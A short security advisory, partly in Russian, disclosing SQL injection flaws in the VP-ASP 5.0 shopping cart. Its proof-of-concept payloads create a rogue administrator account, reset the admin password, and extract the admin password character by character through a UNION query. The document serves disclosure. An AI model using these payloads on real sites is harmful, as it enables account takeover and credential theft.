Программа: VP-ASP 5.0
Несколько уязвимостей обнаружено в VP-ASP shopping cart. Удаленный пользователь может выполнить произвольные команды на целевой системе.
Уязвимость SQL инъекции обнаружена в 'shopsearch.asp' и 'shopdisplayproducts.asp' сценариях. Удаленный пользователь может выполнить произвольный SQL код на целевой базе данных, включая команды операционной
системы.
Пример:
-- PoC code 1:
Платформы: Win32/MSSQL
Posting this data to shopsearch.asp creates new administrative account
Keyword=&category=5); insert into tbluser (fldusername) values ('qasdew')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
fldusername='qasdew'-- &SubCategory=All&action.x=33 &action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where fldusername='qasdew'--&
SubCategory=All&action.x=33&action.y=6
Posting this data to shopsearch.asp changes admin password
Keyword=&category=5); update tbluser set fldpassword='edsaqw' where
fldusername='admin'--&SubCategory= All&action.x=33&action.y=6
-- Vulnerability 2: SQL Injection vulnerability in 'shopdisplayproducts.asp' script
An SQL Injection vulnerability has been found in the shopdisplayproducts.asp
script. Exploitation of the vulnerability will allow remote attacker to read any
information from a database.
-- PoC code 2:
Платформы: Win32/MSSQL
http://somehost.com/vpasp/ shopdisplayproducts.asp?cat= qwerty'%20union%20select%
20fldauto,fldpassword%20from%20 tbluser%20where%20fldusername='admin'%20and %20fldpassword%20like%20'a%25'--
changing value at the end of request
%20'a%25'--
%20'b%25'--
%20'c%25'--
...
and looking through the HTTP response from VP-ASP web server attacker can find the admin
password.